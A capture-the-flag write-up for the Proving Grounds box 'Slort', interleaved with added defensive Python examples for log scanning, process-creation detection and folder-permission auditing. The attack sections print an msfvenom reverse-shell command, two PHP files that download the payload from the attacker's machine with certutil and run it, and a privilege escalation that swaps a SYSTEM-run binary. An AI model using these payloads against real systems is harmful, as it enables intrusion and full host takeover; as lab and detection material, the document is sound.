Slort

Writeup for Slort from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.70.53 all

Service Enumeration

HTTP (Port 4443)

gobuster dir -u http://192.168.70.53:4443/ -w /usr/share/dirb/wordlists/common.txt -t 40

We notice there is an interesting directory /site/.

Notice that the URL is /index.php?page=main.php. A page parameter that carries a filename suggests the site may be vulnerable to LFI. We can test our theory by starting a listener and checking whether we get a connection back.

*** Take note: The target IP above and below may differ as I finished this box on another day. ***
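As an added example (not part of the original writeup), here is the defender's view of the index.php?page= pattern above: a classifier that labels a page value as harmless, a remote inclusion attempt (URL scheme or stream wrapper) or a local traversal attempt, an allow-list lookup that is the fix for the pattern, and a scanner that runs the classifier over web-server access-log lines. The template names and the log lines are constructed for the example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Allow-list of templates the application is meant to serve (assumed names).
ALLOWED_PAGES = {"main.php", "about.php", "contact.php"}

_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)
_DRIVE_RE = re.compile(r"^[a-zA-Z]:[\\/]")


def classify_page_param(value: str) -> str:
    """Label a raw ``page`` value: 'ok', 'remote' (URL or stream wrapper) or 'traversal'."""
    v = unquote(unquote(value))  # strip one or two layers of URL encoding
    if _DRIVE_RE.match(v):
        return "traversal"       # C:\... style absolute path (checked before the scheme test)
    if _SCHEME_RE.match(v) or v.startswith(("//", "\\\\")):
        return "remote"          # http://, ftp://, php://, \\server\share, //host/...
    if ".." in v or v.startswith(("/", "\\")) or "\x00" in v:
        return "traversal"       # parent references, absolute paths, null-byte truncation
    return "ok"


def resolve_page(value: str) -> Optional[str]:
    """Hardened lookup: the parameter selects an allow-listed template or nothing.

    The request value is never used to build a path or a URL, so neither
    local nor remote inclusion is possible regardless of what is sent.
    """
    return value if value in ALLOWED_PAGES else None


_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (classification, client_ip, page_value) for every suspicious request."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group(1), m.group(2)
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for page in query.get("page", []):
            kind = classify_page_param(page)
            if kind != "ok":
                hits.append((kind, ip, page))
    return hits


# Constructed access-log lines in common log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /site/index.php?page=http://10.0.0.9/x.txt HTTP/1.1" 200 88',
    '10.0.0.9 - - [10/Oct/2023:13:56:40 +0000] "GET /site/index.php?page=..%2F..%2Fconfig.ini HTTP/1.1" 200 400',
    '10.0.0.9 - - [10/Oct/2023:13:57:02 +0000] "GET /site/index.php?page=%252e%252e%2Fsecret HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
    print(resolve_page("main.php"), resolve_page("http://10.0.0.9/x.txt"))
```

The double unquote in the classifier is there for the fourth sample line: the web server decodes %252e to %2e, so a single decode still hides the parent reference.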

Exploit

Since the above works, we can create a reverse shell and transfer it onto the box.

To do this we need two PHP files.

The first one downloads the reverse shell executable from our attack machine.

The second one runs it.

We can generate the reverse shell executable using the following:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.66 LPORT=445 -f exe > reverse.exe

Next, we make our two PHP files.

The first file fetches the binary with certutil and saves it as shell.exe:

<?php
// download reverse.exe from our attack machine and save it locally as shell.exe
$exec = system('certutil.exe -urlcache -split -f "http://192.168.49.66:80/home/kali/pg/slort/reverse.exe" shell.exe', $val);
?>

The second file runs the file the first one saved:

<?php
// run the downloaded reverse shell, which connects back to our listener
$exec = system('shell.exe', $val);
?>
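The execution stage above leaves a very recognisable trail in process-creation telemetry: the web server spawns a shell, certutil is used as a downloader, and a fresh executable runs out of the web root. As an added example (not part of the original writeup), the following rules match those three events. The records are constructed in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the paths and IP address are placeholders, not data from the box.

```python
import re
from typing import Dict, List, Tuple

# Windows processes that serve PHP; in normal operation they do not spawn shells or certutil.
WEB_SERVER_IMAGES = {"httpd.exe", "php-cgi.exe", "php.exe", "w3wp.exe", "nginx.exe"}

# certutil used as a downloader: -urlcache together with a URL on the command line.
_CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\b(https?|ftp)://", re.IGNORECASE)

# Executables launched from a web document root (where a web shell drops its payloads).
_WEBROOT = re.compile(r"\\(htdocs|wwwroot|inetpub)\\", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_webshell_activity(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, ProcessId) pairs for process-creation events that match a rule."""
    findings = []
    for ev in events:
        pid = ev["ProcessId"]
        cmd = ev.get("CommandLine", "")
        if _CERTUTIL_DOWNLOAD.search(cmd):
            findings.append(("certutil_download", pid))
        if _basename(ev["ParentImage"]) in WEB_SERVER_IMAGES:
            findings.append(("webserver_spawned_process", pid))
        if _WEBROOT.search(ev["Image"]):
            findings.append(("exec_from_webroot", pid))
    return findings


# Constructed events (not real telemetry). 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    {"ProcessId": "1201", "Image": r"C:\xampp\apache\bin\httpd.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "httpd.exe -k runservice"},
    {"ProcessId": "1340", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "CommandLine": 'cmd.exe /c certutil.exe -urlcache -split -f "http://192.0.2.10/reverse.exe" shell.exe'},
    {"ProcessId": "1341", "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'certutil.exe -urlcache -split -f "http://192.0.2.10/reverse.exe" shell.exe'},
    {"ProcessId": "1350", "Image": r"C:\xampp\htdocs\site\shell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "shell.exe"},
    {"ProcessId": "1400", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for rule, pid in detect_webshell_activity(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The first rule fires on the cmd.exe record as well as on certutil itself, because PHP's system() runs the command through cmd.exe and the whole command line is visible there; the parent-image rule is the one that ties the activity to the web server.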

Privesc

Manually enumerating, we found a backup folder in the root directory.

According to info.txt in that folder, TFTP.exe is run every 5 minutes. Since this looks like a backup procedure, it is highly likely to be running as SYSTEM.

This is very similar to cron jobs on Linux systems. Let's move our reverse shell binary into this directory and rename it to TFTP.exe, so that our reverse shell is run by SYSTEM instead.

After waiting 5 minutes, we get SYSTEM.
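The root cause of this privilege escalation is a directory that a SYSTEM job executes from but that a low-privileged user can write to. As an added example (not part of the original writeup), the following audit parses the text that icacls prints for such a directory and flags any low-privileged principal holding a write-capable right. The directory path C:\Backup, the job name and both ACL listings are constructed; the second listing shows the same folder after it has been restricted to administrators and SYSTEM.

```python
import re
from typing import Dict, List

# Principals that a SYSTEM-level scheduled job must never allow to write to its directory.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
    "Everyone",
}

# icacls rights that let a caller create, overwrite or replace files.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "GW", "GA"}

_ACE_RE = re.compile(r"^(?P<who>.+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(output: str, directory: str) -> Dict[str, List[str]]:
    """Map each principal in ``icacls <directory>`` output to its right tokens.

    icacls prints the path once, in front of the first ACE; later ACEs are indented.
    """
    aces: Dict[str, List[str]] = {}
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(directory):
            line = line[len(directory):].strip()
        m = _ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" trailer
        tokens = []
        for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
            tokens.extend(t for t in group.split(",") if t)
        aces.setdefault(m.group("who"), []).extend(tokens)
    return aces


def low_priv_writers(aces: Dict[str, List[str]]) -> List[str]:
    """Low-privileged principals holding a write-capable right."""
    return sorted(who for who, rights in aces.items()
                  if who in LOW_PRIV_PRINCIPALS and WRITE_RIGHTS & set(rights))


def audit_job_directory(job: str, directory: str, icacls_output: str) -> dict:
    """Verdict for one periodic job: 'high' if a low-privileged user can replace its binary."""
    writers = low_priv_writers(parse_icacls(icacls_output, directory))
    return {"job": job, "directory": directory, "writable_by": writers,
            "risk": "high" if writers else "ok"}


# Constructed icacls output for the backup folder (not taken from the box).
WEAK_ACL = r"""C:\Backup BUILTIN\Administrators:(I)(OI)(CI)(F)
          NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
          BUILTIN\Users:(I)(OI)(CI)(M)
          NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# The same folder after fixing it: only administrators and SYSTEM may write.
FIXED_ACL = r"""C:\Backup BUILTIN\Administrators:(OI)(CI)(F)
          NT AUTHORITY\SYSTEM:(OI)(CI)(F)
          BUILTIN\Users:(OI)(CI)(RX)
"""

if __name__ == "__main__":
    print(audit_job_directory("TFTP backup", r"C:\Backup", WEAK_ACL))
    print(audit_job_directory("TFTP backup", r"C:\Backup", FIXED_ACL))
```

Run the real icacls output of every directory a scheduled task or service executes from through audit_job_directory; any "high" result is exactly the cron-job-style replacement the writeup performs.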
